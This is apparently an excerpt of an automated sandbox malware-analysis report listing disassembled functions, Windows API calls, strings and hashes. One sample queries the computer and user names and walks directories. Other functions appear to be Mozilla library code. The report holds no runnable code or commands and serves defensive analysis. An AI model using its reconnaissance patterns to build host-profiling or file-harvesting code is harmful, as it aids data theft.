Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 22219f9220d6aa6f532a52c794fb2ae0f679ace9e611b28b262caba2176986ab
Instruction ID: cc5e9d3aef36927d6a12aa45025bef6497d3dd2ccf04771389335e0b55179064
Opcode Fuzzy Hash: 22219f9220d6aa6f532a52c794fb2ae0f679ace9e611b28b262caba2176986ab
Instruction Fuzzy Hash: 59E01A31A8434C7BEB91EB90DC96FEE737C9B44B01F004295BA0C5A1C1DE70AB858B91

Function 000A1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 000B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7910
Part of subcall function 000B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000B7917
Part of subcall function 000B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000B792F

Part of subcall function 000B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000A11B7), ref: 000B7880
Part of subcall function 000B7850: RtlAllocateHeap.NTDLL(00000000), ref: 000B7887
Part of subcall function 000B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000B789F

ExitProcess.KERNEL32 ref: 000A11C6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: d24783fbbf6d00a252d62471b3a50e683b8420a54aa48044b3ec97a7ac0393e8
Instruction ID: ceb3e093ec1ab9acbda3dcd29a9720de039d2757ed41fcf8d4f7ac60b097c679
Opcode Fuzzy Hash: d24783fbbf6d00a252d62471b3a50e683b8420a54aa48044b3ec97a7ac0393e8
Instruction Fuzzy Hash: 30E012B5D9430153DA0073F1BC4EBEA369C5B55385F040424FA09E6113FE25F801C6AA

Function 000B8E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 000B8E52

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 1c6c002b00ee59bcc24d6d4d206a973cea3978c517e40c210731778f185f6e1e
Instruction ID: 48eda4f9385b840148bf28791d7c168bc27f8778da87379c94664b723a3f8f50
Opcode Fuzzy Hash: 1c6c002b00ee59bcc24d6d4d206a973cea3978c517e40c210731778f185f6e1e
Instruction Fuzzy Hash: 2B01FB34A04108EFCB14CF98C5897EC7BB5EF04308F28C088D9156B360C775AE84DB95

Non-executed Functions

Function 6C665440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C665492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6654A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6654BE
__Init_thread_footer.LIBCMT ref: 6C6654DB

Part of subcall function 6C68AB3F: EnterCriticalSection.KERNEL32(6C6DE370,?,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284), ref: 6C68AB49
Part of subcall function 6C68AB3F: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68AB7C

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C6654F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C665516
GetCurrentThreadId.KERNEL32 ref: 6C66556A
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665577
moz_xmalloc.MOZGLUE(00000070), ref: 6C665585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C665590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6655E6
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C665616

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetCurrentThreadId.KERNEL32 ref: 6C66563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C665646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C66567C
free.MOZGLUE(?), ref: 6C6656AE

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6656E8
GetCurrentThreadId.KERNEL32 ref: 6C665707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C66570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C665729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C66574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C66576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C665796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6657B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6657CA

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6657C5
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C665749
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C665CF9
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C665724
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C665AC9
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C665BBE
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C665D24
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C665D1C
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C665B38
[I %d/%d] profiler_init, xrefs: 6C66564E
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C665791
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C665D2B
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C665717
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6654B9
GeckoMain, xrefs: 6C665554, 6C6655D5
MOZ_PROFILER_STARTUP, xrefs: 6C6655E1
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C66548D
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C665766
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C665C56
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6654A3
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C66584E
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6657AE
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C665D01
MOZ_BASE_PROFILER_HELP, xrefs: 6C665511
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6656E3

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction ID: 177a8c64f2d46a8a752f75fa61e52c8de68fafea378d92d8cf6f77fefddd9d63
Opcode Fuzzy Hash: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction Fuzzy Hash: 2D2205709043419FDB009F76C89666ABBB5AF8734CF04462AE94A87F42EB31E445CB5F

Function 6C666C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C666CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C666D26

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C666D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C666D73
free.MOZGLUE(00000000), ref: 6C666D80
CertGetNameStringW.CRYPT32 ref: 6C666DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C666DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C666DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C666E10
CryptMsgClose.CRYPT32(00000000), ref: 6C666E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C666E34
CreateFileW.KERNEL32 ref: 6C666EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C666F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C66709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C667103
free.MOZGLUE(00000000), ref: 6C667153
CloseHandle.KERNEL32(?), ref: 6C667176
__Init_thread_footer.LIBCMT ref: 6C667209
__Init_thread_footer.LIBCMT ref: 6C66723A
__Init_thread_footer.LIBCMT ref: 6C66726B
__Init_thread_footer.LIBCMT ref: 6C66729C
__Init_thread_footer.LIBCMT ref: 6C6672DC
__Init_thread_footer.LIBCMT ref: 6C66730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6673C2
VerSetConditionMask.NTDLL ref: 6C6673F3
VerSetConditionMask.NTDLL ref: 6C6673FF
VerSetConditionMask.NTDLL ref: 6C667406
VerSetConditionMask.NTDLL ref: 6C66740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C66741A
moz_xmalloc.MOZGLUE(?), ref: 6C66755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C667568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C667585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C667598
free.MOZGLUE(00000000), ref: 6C6675AC

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

SHA256, xrefs: 6C666EC0
CryptCATAdminReleaseCatalogContext, xrefs: 6C6672C8
wintrust.dll, xrefs: 6C6672CD
(, xrefs: 6C66768A

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction ID: 66a7cec88e3af785e2294924bd49185265c2d8ef4da158a834f2fe8299d93b89
Opcode Fuzzy Hash: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction Fuzzy Hash: 9852E871A042149FEB21DF26CC84BAA77B8EF46704F144599E909A7A40DB70BF84CF5A

Function 6C6B34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EE2

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6B61DD
Part of subcall function 6C6B6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6B622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4157

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6B6250
Part of subcall function 6C6B6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6B6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4896
free.MOZGLUE ref: 6C6B489F

Strings

, xrefs: 6C6B4CD2

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction ID: 58ee6da397fa28b9ce1d1355d0b4e0bc2cd33d329d9bb7f3149907bc63987aa2
Opcode Fuzzy Hash: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction Fuzzy Hash: 3CF26C74908B808FC725CF29C08469AFBF1FFCA304F118A5ED99997711DB71A896CB46

Function 6C6664C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6664DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6664F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C666505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C666518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C66671C
GetCurrentProcess.KERNEL32 ref: 6C666724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C66672F
GetCurrentProcess.KERNEL32 ref: 6C666759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C666764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C666A80
GetSystemInfo.KERNEL32(?), ref: 6C666ABE
__Init_thread_footer.LIBCMT ref: 6C666AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AF7

Strings

detoured.dll, xrefs: 6C6664DA
_etoured.dll, xrefs: 6C6664ED
nvd3d9wrap.dll, xrefs: 6C666500
nvdxgiwrap.dll, xrefs: 6C666513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C666798
user32.dll, xrefs: 6C666526

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction ID: 7cc53657b461bba9e13a34008fa2f976f06660de6afbf4b2ef5565db851e3b8a
Opcode Fuzzy Hash: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction Fuzzy Hash: 5CF1E6709052199FDB20CF26DC887DAB7B5AF46318F144299D809E3B41D731EE85CF9A

Function 000B38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 000B38CC
FindFirstFileA.KERNEL32(?,?), ref: 000B38E3
lstrcat.KERNEL32(?,?), ref: 000B3935
StrCmpCA.SHLWAPI(?,000C0F70), ref: 000B3947
StrCmpCA.SHLWAPI(?,000C0F74), ref: 000B395D
FindNextFileA.KERNEL32(000000FF,?), ref: 000B3C67
FindClose.KERNEL32(000000FF), ref: 000B3C7C

Strings

%s\*, xrefs: 000B38C0
%s%s, xrefs: 000B3AAD
%s\%s\%s, xrefs: 000B3A4A
%s\%s, xrefs: 000B397A
%s\%s, xrefs: 000B3A6F

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
